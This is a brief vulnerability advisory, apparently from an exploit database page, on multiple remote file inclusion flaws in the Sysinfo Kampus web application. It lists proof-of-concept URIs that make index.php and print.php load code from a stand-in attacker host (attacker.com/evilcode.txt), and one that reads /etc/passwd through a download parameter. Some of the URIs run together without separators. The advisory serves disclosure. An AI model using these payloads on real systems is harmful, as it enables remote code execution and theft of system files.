• info
• discussion
• exploit
• solution
• references

Sysinfo Kampus Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?exec=http://attacker.com/evilcode.txt?http://www.example.com/print.php?print=http://attacker.com/evilcode.txt?
http://www.example.com/index.php?exec=print&print=http://attacker.com/evilcode.txt?http://www.example.com/index.php?exec=download&dir=/etc/passwd